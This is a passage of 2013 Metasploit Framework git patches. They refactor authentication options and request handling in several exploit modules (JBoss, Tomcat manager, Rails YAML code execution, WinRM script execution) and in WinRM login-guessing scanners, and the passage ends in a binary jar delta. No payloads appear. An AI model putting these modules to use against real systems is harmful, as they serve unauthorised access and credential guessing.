accepted!") elsif (res.code == 200 and res.body =~ /The passwords you supplied match/) print_status("Command successfully executed (according to the server).") end diff --git a/modules/exploits/multi/http/axis2_deployer.rb b/modules/exploits/multi/http/axis2_deployer.rb index 565d73a293c1..9f030bbbc2fe 100644 --- a/modules/exploits/multi/http/axis2_deployer.rb +++ b/modules/exploits/multi/http/axis2_deployer.rb @@ -227,9 +227,7 @@ def upload_exec(session,rpath) authmsg = res.headers['WWW-Authenticate'] end print_error("The remote server responded expecting authentication") - if datastore['BasicAuthUser'] and datastore['BasicAuthPass'] - print_error("BasicAuthUser \"%s\" failed to authenticate" % datastore['BasicAuthUser']) - elsif authmsg + if authmsg print_error("WWW-Authenticate: %s" % authmsg) end cleanup_instructions(rpath, name) # display cleanup info diff --git a/modules/exploits/multi/http/jboss_bshdeployer.rb b/modules/exploits/multi/http/jboss_bshdeployer.rb index 07d5eb2adaef..f350fe498483 100644 --- a/modules/exploits/multi/http/jboss_bshdeployer.rb +++ b/modules/exploits/multi/http/jboss_bshdeployer.rb @@ -96,9 +96,6 @@ def initialize(info = {}) def exploit - datastore['BasicAuthUser'] = datastore['USERNAME'] - datastore['BasicAuthPass'] = datastore['PASSWORD'] - jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8)) app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8)) diff --git a/modules/exploits/multi/http/jboss_maindeployer.rb b/modules/exploits/multi/http/jboss_maindeployer.rb index 7c36c1fa1624..2297b5256928 100644 --- a/modules/exploits/multi/http/jboss_maindeployer.rb +++ b/modules/exploits/multi/http/jboss_maindeployer.rb @@ -123,9 +123,6 @@ def auto_target def exploit - datastore['BasicAuthUser'] = datastore['USERNAME'] - datastore['BasicAuthPass'] = datastore['PASSWORD'] - jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8)) app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8)) diff --git a/modules/exploits/multi/http/tomcat_mgr_deploy.rb b/modules/exploits/multi/http/tomcat_mgr_deploy.rb index a46cd2c033f5..2757cb6e1322 100644 --- a/modules/exploits/multi/http/tomcat_mgr_deploy.rb +++ b/modules/exploits/multi/http/tomcat_mgr_deploy.rb @@ -112,9 +112,6 @@ def initialize(info = {}) end def check - datastore['BasicAuthUser'] = datastore['USERNAME'] - datastore['BasicAuthPass'] = datastore['PASSWORD'] - res = query_serverinfo disconnect return CheckCode::Unknown if res.nil? @@ -127,8 +124,8 @@ def check :host => rhost, :port => rport, :sname => (ssl ? "https" : "http"), - :user => datastore['BasicAuthUser'], - :pass => datastore['BasicAuthPass'], + :user => datastore['USERNAME'], + :pass => datastore['PASSWORD'], :proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}", :active => true ) @@ -164,9 +161,6 @@ def auto_target def exploit - datastore['BasicAuthUser'] = datastore['USERNAME'] - datastore['BasicAuthPass'] = datastore['PASSWORD'] - mytarget = target if (target.name =~ /Automatic/) mytarget = auto_target @@ -221,8 +215,8 @@ def exploit :host => rhost, :port => rport, :sname => (ssl ? "https" : "http"), - :user => datastore['BasicAuthUser'], - :pass => datastore['BasicAuthPass'], + :user => datastore['USERNAME'], + :pass => datastore['PASSWORD'], :proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}", :active => true ) diff --git a/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb b/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb index 9865c8716bd4..3bfd6c668e18 100644 --- a/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb +++ b/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb @@ -67,9 +67,6 @@ def initialize(info = {}) end def go(command) - datastore['BasicAuthUser'] = datastore['USERNAME'] - datastore['BasicAuthPass'] = datastore['PASSWORD'] - xml = <<-EOS <?xml version="1.0"?> <methodCall> diff --git a/modules/exploits/windows/http/easyftp_list.rb b/modules/exploits/windows/http/easyftp_list.rb index 3484cdf86f47..c337ecdeee63 100644 --- a/modules/exploits/windows/http/easyftp_list.rb +++ b/modules/exploits/windows/http/easyftp_list.rb @@ -72,8 +72,8 @@ def initialize(info = {}) register_options( [ Opt::RPORT(8080), - OptString.new('BasicAuthUser', [true, 'The HTTP username to specify for basic authentication', 'anonymous']), - OptString.new('BasicAuthPass', [true, 'The HTTP password to specify for basic authentication', 'mozilla@example.com']), + OptString.new('USERNAME', [true, 'The HTTP username to specify for basic authentication', 'anonymous']), + OptString.new('PASSWORD', [true, 'The HTTP password to specify for basic authentication', 'mozilla@example.com']), ], self.class) end From 0c57026065203ccab0cad3f7e06c4b278f066fba Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Mon, 4 Feb 2013 13:13:08 -0600 Subject: [PATCH 273/421] Remove junk added earlier i added junk to tasos' class when we were going to attempt this a different way. housekeeping to clean it up --- lib/msf/core/auxiliary/web/http.rb | 17 ----------------- 1 file changed, 17 deletions(-) diff --git a/lib/msf/core/auxiliary/web/http.rb b/lib/msf/core/auxiliary/web/http.rb index 0f88517176cb..407dfbd8285c 100644 --- a/lib/msf/core/auxiliary/web/http.rb +++ b/lib/msf/core/auxiliary/web/http.rb @@ -148,23 +148,6 @@ def request( url, opts = {} ) while rlimit >= 0 rlimit -= 1 res = _request( url, opts ) - if res.code == 401 and res.headers['WWW-Authenticate'] and opts['username'] - if res.headers['WWW-Authenticate'].include? 'Basic' - opts['password']||= '' - opts['basic_auth'] = opts['username'] + ":" + opts['password'] - res = _request( url, opts ) - elsif res.headers['WWW-Authenticate'].include? 'Digest' - opts['DigestAuthUser'] = opts['username'] - opts['DigestAuthPassword'] = opts['password'] - res = send_digest_request_cgi(opts,timeout) - elsif res.headers['WWW-Authenticate'].include? "Negotiate" - opts['provider'] = 'Negotiate' - res = send_request_auth_negotiate(opts,timeout) - elsif res.headers['WWW-Authenticate'].include? "NTLM" - opts['provider'] = 'NTLM' - res = send_request_auth_negotiate(opts,timeout) - end - end return res if !opts[:follow_redirect] || !url = res.headers['location'] end nil From 413c37e5068902e362c80d3d773b12748c22046d Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Mon, 4 Feb 2013 13:39:40 -0600 Subject: [PATCH 274/421] Add invisible auth to Web::HTTP add the invisible auth support to tasos' http class --- lib/msf/core/auxiliary/web/http.rb | 13 ++++++++++--- 1 file changed, 10 insertions(+), 3 deletions(-) diff --git a/lib/msf/core/auxiliary/web/http.rb b/lib/msf/core/auxiliary/web/http.rb index 407dfbd8285c..6690f075fd10 100644 --- a/lib/msf/core/auxiliary/web/http.rb +++ b/lib/msf/core/auxiliary/web/http.rb @@ -70,6 +70,7 @@ def timed_out attr_reader :framework attr_accessor :redirect_limit + attr_accessor :username , :password def initialize( opts = {} ) @opts = opts.dup @@ -85,8 +86,8 @@ def initialize( opts = {} ) @request_opts = {} if opts[:auth].is_a? Hash - @request_opts['basic_auth'] = [ opts[:auth][:user].to_s + ':' + - opts[:auth][:password] ]. pack( 'm*' ).gsub( /\s+/, '' ) + @username = opts[:auth][:user].to_s + @password = opts[:auth][:password].to_s end self.redirect_limit = opts[:redirect_limit] || 20 @@ -106,7 +107,9 @@ def connect opts[:target].port, {}, opts[:target].ssl, - 'SSLv23' + 'SSLv23', + username, + password ) c.set_config({ @@ -294,6 +297,10 @@ def _request( url, opts = {} ) opts['data'] = body if body c = connect + if opts['username'] and opts['username'] != '' + c.username = opts['username'].to_s + c.password = opts['password'].to_s + end Response.from_rex_response c.send_recv( c.request_cgi( opts ), timeout ) rescue ::Timeout::Error Response.timed_out From 9b84e5b3c421bb5e3943a20af985cec4325e3c78 Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Mon, 4 Feb 2013 13:59:58 -0600 Subject: [PATCH 275/421] Fix raw requests to work as well as cgi --- lib/rex/proto/http/client.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 725f451b4253..9d019ebac86d 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -201,8 +201,8 @@ def request_raw(opts={}) req << set_extra_headers(c_head) req << set_raw_headers(c_rawh) req << set_body(c_body) - - req + + {:string => req , :opts => opts} end From c71b803413a36c9d3b14a4bb0f98ba16e8651030 Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Mon, 4 Feb 2013 14:38:08 -0600 Subject: [PATCH 276/421] Add invisible auth to web crawler the anemone web crawler now properly supports our invisible auth scheme for rex http. --- lib/anemone/rex_http.rb | 4 +++- lib/msf/core/auxiliary/crawler.rb | 16 ++++++++-------- 2 files changed, 11 insertions(+), 9 deletions(-) diff --git a/lib/anemone/rex_http.rb b/lib/anemone/rex_http.rb index ce6a71a17ff7..f606f289fc27 100644 --- a/lib/anemone/rex_http.rb +++ b/lib/anemone/rex_http.rb @@ -188,7 +188,9 @@ def connection(url) context, url.scheme == "https", 'SSLv23', - @opts[:proxies] + @opts[:proxies], + @opts[:username], + @opts[:password] ) conn.set_config( diff --git a/lib/msf/core/auxiliary/crawler.rb b/lib/msf/core/auxiliary/crawler.rb index 36e963ecbc8f..86792381ed24 100644 --- a/lib/msf/core/auxiliary/crawler.rb +++ b/lib/msf/core/auxiliary/crawler.rb @@ -22,7 +22,9 @@ def initialize(info = {}) Opt::Proxies, OptInt.new('MAX_PAGES', [ true, 'The maximum number of pages to crawl per URL', 500]), OptInt.new('MAX_MINUTES', [ true, 'The maximum number of minutes to spend on each URL', 5]), - OptInt.new('MAX_THREADS', [ true, 'The maximum number of concurrent requests', 4]) + OptInt.new('MAX_THREADS', [ true, 'The maximum number of concurrent requests', 4]), + OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication']), + OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication']) ], self.class ) @@ -34,8 +36,6 @@ def initialize(info = {}) OptString.new('UserAgent', [true, 'The User-Agent header to use for all requests', "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" ]), - OptString.new('BasicAuthUser', [false, 'The HTTP username to specify for basic authentication']), - OptString.new('BasicAuthPass', [false, 'The HTTP password to specify for basic authentication']), OptString.new('HTTPAdditionalHeaders', [false, "A list of additional headers to send (separated by \\x01)"]), OptString.new('HTTPCookie', [false, "A HTTP cookie header to send with each request"]), OptBool.new('SSL', [ false, 'Negotiate SSL for outgoing connections', false]), @@ -118,8 +118,9 @@ def run :info => "" }) - if datastore['BasicAuthUser'] - t[:http_basic_auth] = [ "#{datastore['BasicAuthUser']}:#{datastore['BasicAuthPass']}" ].pack("m*").gsub(/\s+/, '') + if datastore['USERNAME'] and datastore['USERNAME'] != '' + t[:username] = datastore['USERNAME'].to_s + t[:password] = datastore['PASSWORD'].to_s end if datastore['HTTPCookie'] @@ -278,9 +279,8 @@ def crawler_options(t) opts[:cookies] = t[:cookies] end - if t[:http_basic_auth] - opts[:http_basic_auth] = t[:http_basic_auth] - end + opts[:username] = t[:username] || '' + opts[:password] =t[:password] || '' opts end From 39cafd0cdeaf949b85f4d2a6a6881ff61238ca09 Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc <jeff@jarmoc.com> Date: Mon, 4 Feb 2013 15:08:34 -0600 Subject: [PATCH 277/421] Use OptEnum instead of OptString --- modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb b/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb index 7df91ce0636f..8eb9e1ce59e8 100644 --- a/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb +++ b/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb @@ -33,7 +33,7 @@ def initialize(info={}) register_options([ OptString.new('URIPATH', [true, "The URI to test", "/"]), - OptString.new('HTTP_METHOD', [ true, 'The HTTP request method (GET, POST, PUT typically work)', "POST"]) + OptEnum.new('HTTP_METHOD', [true, 'HTTP Method', 'POST', ['GET', 'POST', 'PUT'] ]), ], self.class) end From b793579f5e38b1319b2a5e51f653089376af2c13 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Mon, 4 Feb 2013 15:12:31 -0600 Subject: [PATCH 278/421] Fix silly revert of MDM version --- Gemfile | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Gemfile b/Gemfile index dcdea0185f3c..fc720a23b7a5 100755 --- a/Gemfile +++ b/Gemfile @@ -7,7 +7,7 @@ gem 'activerecord' # Needed for some admin modules (scrutinizer_add_user.rb) gem 'json' # Database models shared between framework and Pro. -gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.3.0' +gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.4.0' # Needed by msfgui and other rpc components gem 'msgpack' # Needed by anemone crawler From 9b30e354eaaa837ce63492e16f73885d6c11e38c Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc <jeff@jarmoc.com> Date: Mon, 4 Feb 2013 15:32:36 -0600 Subject: [PATCH 279/421] Updates HTTP_METHOD option to use OptEnum. --- modules/exploits/multi/http/rails_json_yaml_code_exec.rb | 3 +-- modules/exploits/multi/http/rails_xml_yaml_code_exec.rb | 3 +-- 2 files changed, 2 insertions(+), 4 deletions(-) diff --git a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb index 4066d047fef5..6fafba24d9de 100644 --- a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb +++ b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb @@ -55,8 +55,7 @@ def initialize(info = {}) [ Opt::RPORT(80), OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]), - OptString.new('HTTP_METHOD', [ true, 'The HTTP request method (GET, POST, PUT typically work)', "POST"]) - + OptEnum.new('HTTP_METHOD', [true, 'HTTP Method', 'POST', ['GET', 'POST', 'PUT'] ]) ], self.class) end diff --git a/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb b/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb index 8743f76106cd..e5e5311505bc 100644 --- a/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb +++ b/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb @@ -53,8 +53,7 @@ def initialize(info = {}) [ Opt::RPORT(80), OptString.new('URIPATH', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]), - OptString.new('HTTP_METHOD', [ true, 'The HTTP request method (GET, POST, PUT typically work)', "POST"]) - + OptEnum.new('HTTP_METHOD', [true, 'HTTP Method', 'POST', ['GET', 'POST', 'PUT'] ]) ], self.class) register_evasion_options( From 44d4e298dcca40225ede5538bf9c46e7066fb97f Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Mon, 4 Feb 2013 15:48:31 -0600 Subject: [PATCH 280/421] Attempting to cleanup winrm auth --- lib/msf/core/exploit/winrm.rb | 118 ++++-------------- .../auxiliary/scanner/winrm/winrm_login.rb | 2 +- modules/auxiliary/scanner/winrm/winrm_wql.rb | 2 +- .../windows/winrm/winrm_script_exec.rb | 24 +--- 4 files changed, 29 insertions(+), 117 deletions(-) diff --git a/lib/msf/core/exploit/winrm.rb b/lib/msf/core/exploit/winrm.rb index 72b6a1f7242d..3eb7fae2ca00 100644 --- a/lib/msf/core/exploit/winrm.rb +++ b/lib/msf/core/exploit/winrm.rb @@ -42,7 +42,7 @@ def winrm_poke(timeout = 20) c = connect(opts) to = opts[:timeout] || timeout ctype = "application/soap+xml;charset=UTF-8" - resp, c = send_request_cgi(opts.merge({ + resp, c = send_winrm_request(opts.merge({ 'uri' => opts['uri'], 'method' => 'POST', 'ctype' => ctype, @@ -61,7 +61,7 @@ def parse_auth_methods(resp) end def winrm_run_cmd(cmd, timeout=20) - resp,c = send_request_ntlm(winrm_open_shell_msg,timeout) + resp = send_winrm_request(winrm_open_shell_msg,timeout) if resp.nil? print_error "Recieved no reply from server" return nil @@ -76,17 +76,17 @@ def winrm_run_cmd(cmd, timeout=20) return retval end shell_id = winrm_get_shell_id(resp) - resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id),timeout) + resp = send_winrm_request(winrm_cmd_msg(cmd, shell_id),timeout) cmd_id = winrm_get_cmd_id(resp) - resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id),timeout) + resp = send_winrm_request(winrm_cmd_recv_msg(shell_id,cmd_id),timeout) streams = winrm_get_cmd_streams(resp) - resp,c = send_request_ntlm(winrm_terminate_cmd_msg(shell_id,cmd_id),timeout) - resp,c = send_request_ntlm(winrm_delete_shell_msg(shell_id)) + resp = send_winrm_request(winrm_terminate_cmd_msg(shell_id,cmd_id),timeout) + resp = send_winrm_request(winrm_delete_shell_msg(shell_id)) return streams end def winrm_run_cmd_hanging(cmd, timeout=20) - resp,c = send_request_ntlm(winrm_open_shell_msg,timeout) + resp = send_winrm_request(winrm_open_shell_msg,timeout) if resp.nil? print_error "Recieved no reply from server" return nil @@ -101,9 +101,9 @@ def winrm_run_cmd_hanging(cmd, timeout=20) return retval end shell_id = winrm_get_shell_id(resp) - resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id),timeout) + resp = send_winrm_request(winrm_cmd_msg(cmd, shell_id),timeout) cmd_id = winrm_get_cmd_id(resp) - resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id),timeout) + resp = send_winrm_request(winrm_cmd_recv_msg(shell_id,cmd_id),timeout) streams = winrm_get_cmd_streams(resp) return streams end @@ -219,94 +219,6 @@ def generate_uuid ::Rex::Proto::DCERPC::UUID.uuid_unpack(Rex::Text.rand_text(16)) end - def send_request_ntlm(data, timeout = 20) - opts = { - 'uri' => datastore['URI'], - 'data' => data, - 'username' => datastore['USERNAME'], - 'password' => datastore['PASSWORD'] - } - ntlm_options = { - :signing => false, - :usentlm2_session => datastore['NTLM::UseNTLM2_session'], - :use_ntlmv2 => datastore['NTLM::UseNTLMv2'], - :send_lm => datastore['NTLM::SendLM'], - :send_ntlm => datastore['NTLM::SendNTLM'] - } - ntlmssp_flags = NTLM_UTILS.make_ntlm_flags(ntlm_options) - workstation_name = Rex::Text.rand_text_alpha(rand(8)+1) - domain_name = datastore['DOMAIN'] - ntlm_message_1 = "NEGOTIATE " + Rex::Text::encode_base64(NTLM_UTILS::make_ntlmssp_blob_init( domain_name, - workstation_name, - ntlmssp_flags)) - to = opts[:timeout] || timeout - begin - c = connect(opts) - ctype = "application/soap+xml;charset=UTF-8" - # First request to get the challenge - r = c.request_cgi(opts.merge({ - 'uri' => opts['uri'], - 'method' => 'POST', - 'ctype' => ctype, - 'headers' => { 'Authorization' => ntlm_message_1}, - 'data' => opts['data'] - })) - resp = c.send_recv(r, to) - unless resp.kind_of? Rex::Proto::Http::Response - return [nil,nil] - end - return [nil,nil] if resp.code == 404 - return [nil,nil] unless resp.code == 401 && resp.headers['WWW-Authenticate'] - # Get the challenge and craft the response - ntlm_challenge = resp.headers['WWW-Authenticate'].match(/NEGOTIATE ([A-Z0-9\x2b\x2f=]+)/i)[1] - return [nil,nil] unless ntlm_challenge - - #old and simplier method but not compatible with windows 7/2008r2 - #ntlm_message_2 = Rex::Proto::NTLM::Message.decode64(ntlm_challenge) - #ntlm_message_3 = ntlm_message_2.response( {:user => opts['username'],:password => opts['password']}, {:ntlmv2 => true}) - ntlm_message_2 = Rex::Text::decode_base64(ntlm_challenge) - blob_data = NTLM_UTILS.parse_ntlm_type_2_blob(ntlm_message_2) - challenge_key = blob_data[:challenge_key] - server_ntlmssp_flags = blob_data[:server_ntlmssp_flags] #else should raise an error - #netbios name - default_name = blob_data[:default_name] || '' - #netbios domain - default_domain = blob_data[:default_domain] || '' - #dns name - dns_host_name = blob_data[:dns_host_name] || '' - #dns domain - dns_domain_name = blob_data[:dns_domain_name] || '' - #Client time - chall_MsvAvTimestamp = blob_data[:chall_MsvAvTimestamp] || '' - spnopt = {:use_spn => datastore['NTLM::SendSPN'], :name => self.rhost} - resp_lm, - resp_ntlm, - client_challenge, - ntlm_cli_challenge = NTLM_UTILS.create_lm_ntlm_responses(opts['username'], opts['password'], challenge_key, - domain_name, default_name, default_domain, - dns_host_name, dns_domain_name, chall_MsvAvTimestamp, - spnopt, ntlm_options) - ntlm_message_3 = NTLM_UTILS.make_ntlmssp_blob_auth(domain_name, workstation_name, opts['username'], - resp_lm, resp_ntlm, '', ntlmssp_flags) - ntlm_message_3 = Rex::Text::encode_base64(ntlm_message_3) - # Send the response - r = c.request_cgi(opts.merge({ - 'uri' => opts['uri'], - 'method' => 'POST', - 'ctype' => ctype, - 'headers' => { 'Authorization' => "NEGOTIATE #{ntlm_message_3}"}, - 'data' => opts['data'] - })) - resp = c.send_recv(r, to, true) - unless resp.kind_of? Rex::Proto::Http::Response - return [nil,nil] - end - return [nil,nil] if resp.code == 404 - return [resp,c] - rescue ::Errno::EPIPE, ::Timeout::Error - end - end - def accepts_ntlm_auth parse_auth_methods(winrm_poke).include? "Negotiate" end @@ -329,6 +241,18 @@ def wmi_namespace return "/root/cimv2/" end + def send_winrm_request(data, timeout=20) + opts = { + 'uri' => datastore['URI'], + 'method' => 'POST', + 'data' => data, + 'username' => datastore['USERNAME'], + 'password' => datastore['PASSWORD'], + 'ctype' => "application/soap+xml;charset=UTF-8" + } + send_request_cgi(opts,timeout) + end + private diff --git a/modules/auxiliary/scanner/winrm/winrm_login.rb b/modules/auxiliary/scanner/winrm/winrm_login.rb index d8012fb723f9..564e794b2270 100644 --- a/modules/auxiliary/scanner/winrm/winrm_login.rb +++ b/modules/auxiliary/scanner/winrm/winrm_login.rb @@ -44,7 +44,7 @@ def run_host(ip) return end each_user_pass do |user, pass| - resp,c = send_request_ntlm(test_request) + resp = send_winrm_request(test_request) if resp.nil? print_error "#{ip}:#{rport}: Got no reply from the server, connection may have timed out" return diff --git a/modules/auxiliary/scanner/winrm/winrm_wql.rb b/modules/auxiliary/scanner/winrm/winrm_wql.rb index ed09cfd5830e..1588d9d3855b 100644 --- a/modules/auxiliary/scanner/winrm/winrm_wql.rb +++ b/modules/auxiliary/scanner/winrm/winrm_wql.rb @@ -47,7 +47,7 @@ def run_host(ip) return end - resp,c = send_request_ntlm(winrm_wql_msg(datastore['WQL'])) + resp = send_winrm_request(winrm_wql_msg(datastore['WQL'])) if resp.nil? print_error "Got no reply from the server" return diff --git a/modules/exploits/windows/winrm/winrm_script_exec.rb b/modules/exploits/windows/winrm/winrm_script_exec.rb index 666ca66d3dba..62e343a79896 100644 --- a/modules/exploits/windows/winrm/winrm_script_exec.rb +++ b/modules/exploits/windows/winrm/winrm_script_exec.rb @@ -66,20 +66,8 @@ def initialize(info = {}) @compat_mode = false end - def check - unless accepts_ntlm_auth - print_error "The Remote WinRM server does not appear to allow Negotiate (NTLM) auth" - return Msf::Exploit::CheckCode::Safe - end - - return Msf::Exploit::CheckCode::Vulnerable - end - - def exploit - unless check == Msf::Exploit::CheckCode::Vulnerable - return - end + unless valid_login? print_error "Login Failure. Recheck your credentials" return @@ -141,7 +129,7 @@ def encoded_psh(script) def temp_dir print_status "Grabbing %TEMP%" - resp,c = send_request_ntlm(winrm_open_shell_msg) + resp = send_winrm_request(winrm_open_shell_msg) if resp.nil? print_error "Got no reply from the server" return nil @@ -152,16 +140,16 @@ def temp_dir end shell_id = winrm_get_shell_id(resp) cmd = "echo %TEMP%" - resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id)) + resp= send_winrm_request(winrm_cmd_msg(cmd, shell_id)) cmd_id = winrm_get_cmd_id(resp) - resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id)) + resp = send_winrm_request(winrm_cmd_recv_msg(shell_id,cmd_id)) streams = winrm_get_cmd_streams(resp) return streams['stdout'].chomp end def check_remote_arch wql = %q{select AddressWidth from Win32_Processor where DeviceID="CPU0"} - resp,c = send_request_ntlm(winrm_wql_msg(wql)) + resp = send_winrm_request(winrm_wql_msg(wql)) #Default to x86 if we can't be sure return "x86" if resp.nil? or resp.code != 200 resp_tbl = parse_wql_response(resp) @@ -247,7 +235,7 @@ def powershell2? def valid_login? data = winrm_wql_msg("Select Name,Status from Win32_Service") - resp,c = send_request_ntlm(data) + resp = send_winrm_request(data) unless resp.code == 200 return false end From af6b0615fb306a8f18cc9385b151da8629654986 Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Mon, 4 Feb 2013 16:42:24 -0600 Subject: [PATCH 281/421] fix pipelining winrm is unforgiving of pipelining from non ntlm requests into the challenge response cycle. we must clear our initial tcp session before starting ntlm auth for winrm --- lib/rex/proto/http/client.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 9d019ebac86d..c06de1884e38 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -463,7 +463,7 @@ def digest_auth(opts={}) r = request_cgi(opts.merge({ 'uri' => path, 'method' => method })) - resp = _send_recv(r, to, true) + resp = _send_recv(r, to) unless resp.kind_of? Rex::Proto::Http::Response return nil end @@ -610,7 +610,7 @@ def negotiate_auth(opts={}) # First request to get the challenge opts['headers']['Authorization'] = ntlm_message_1 r = request_cgi(opts) - resp = _send_recv(r, to, true) + resp = _send_recv(r, to) unless resp.kind_of? Rex::Proto::Http::Response return nil end From 877fb017b635f6e4e9653ded428655cbac5a54ac Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Mon, 4 Feb 2013 16:50:43 -0600 Subject: [PATCH 282/421] remove negotiate requirements winrm can support basic, and now these modules can too, for free --- lib/msf/core/exploit/winrm.rb | 4 ---- modules/auxiliary/scanner/winrm/winrm_cmd.rb | 4 ---- modules/auxiliary/scanner/winrm/winrm_login.rb | 4 ---- modules/auxiliary/scanner/winrm/winrm_wql.rb | 5 ----- 4 files changed, 17 deletions(-) diff --git a/lib/msf/core/exploit/winrm.rb b/lib/msf/core/exploit/winrm.rb index 3eb7fae2ca00..960bff05ce58 100644 --- a/lib/msf/core/exploit/winrm.rb +++ b/lib/msf/core/exploit/winrm.rb @@ -219,10 +219,6 @@ def generate_uuid ::Rex::Proto::DCERPC::UUID.uuid_unpack(Rex::Text.rand_text(16)) end - def accepts_ntlm_auth - parse_auth_methods(winrm_poke).include? "Negotiate" - end - def target_url proto = "http" if rport == 5986 or datastore['SSL'] diff --git a/modules/auxiliary/scanner/winrm/winrm_cmd.rb b/modules/auxiliary/scanner/winrm/winrm_cmd.rb index 12f0c7042250..88e9e717d605 100644 --- a/modules/auxiliary/scanner/winrm/winrm_cmd.rb +++ b/modules/auxiliary/scanner/winrm/winrm_cmd.rb @@ -40,10 +40,6 @@ def initialize def run_host(ip) - unless accepts_ntlm_auth - print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth" - return - end streams = winrm_run_cmd(datastore['CMD']) return unless streams.class == Hash print_error streams['stderr'] unless streams['stderr'] == '' diff --git a/modules/auxiliary/scanner/winrm/winrm_login.rb b/modules/auxiliary/scanner/winrm/winrm_login.rb index 564e794b2270..946903113efe 100644 --- a/modules/auxiliary/scanner/winrm/winrm_login.rb +++ b/modules/auxiliary/scanner/winrm/winrm_login.rb @@ -39,10 +39,6 @@ module without SSL, the 'AllowUnencrypted' winrm option must be set. def run_host(ip) - unless accepts_ntlm_auth - print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth" - return - end each_user_pass do |user, pass| resp = send_winrm_request(test_request) if resp.nil? diff --git a/modules/auxiliary/scanner/winrm/winrm_wql.rb b/modules/auxiliary/scanner/winrm/winrm_wql.rb index 1588d9d3855b..0c5eeb627414 100644 --- a/modules/auxiliary/scanner/winrm/winrm_wql.rb +++ b/modules/auxiliary/scanner/winrm/winrm_wql.rb @@ -42,11 +42,6 @@ def initialize def run_host(ip) - unless accepts_ntlm_auth - print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth" - return - end - resp = send_winrm_request(winrm_wql_msg(datastore['WQL'])) if resp.nil? print_error "Got no reply from the server" From 447f78cb24e82b3e9ceecc03ff24c05b4a46c0bd Mon Sep 17 00:00:00 2001 From: scriptjunkie <scriptjunkie@scriptjunkie.us> Date: Mon, 4 Feb 2013 17:19:54 -0600 Subject: [PATCH 283/421] Handle nonstandard ports when starting new msfrpcd. --- data/gui/msfgui.jar | Bin 800505 -> 799474 bytes .../msfguijava/src/msfgui/RpcConnection.java | 3 ++- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/data/gui/msfgui.jar b/data/gui/msfgui.jar index 3fc94594f6800e835ef71096f81f3f2411d5c11c..495e0ef2171c0fab4aa20bff970421e09b5352b5 100755 GIT binary patch delta 57073 zcmb4s2Vhmj^7riSY4_%&H)<dd2tD-Pd+!L+LzUi(D1;_WdVobhItYRVP%nyz2m&fn zY+wTm7DN;k6&3aS%{ey-&;R@0<3-syd(O=4Y@6Mko!$G}^@=}!Q8B7x8)XEE9HPMw zHEz5jD%}_axUZHL#<97L8)v^G%J~n5O!Xg1%d-AM4_VEBSRwlxuK@YL&vJ^2<EP_; z_eVdINW}k&lg{`oqKHmOaxFc5h8f5z8>B)sJ4kbAu0sz6>0X-0Z|2*yAV?N13?Q<| zriX(R@FR=)%@UiI1}V~iv&^RDL5lGsD{NXBq<BA)&8${2pVdsi#wH!4we(1k^3yt- 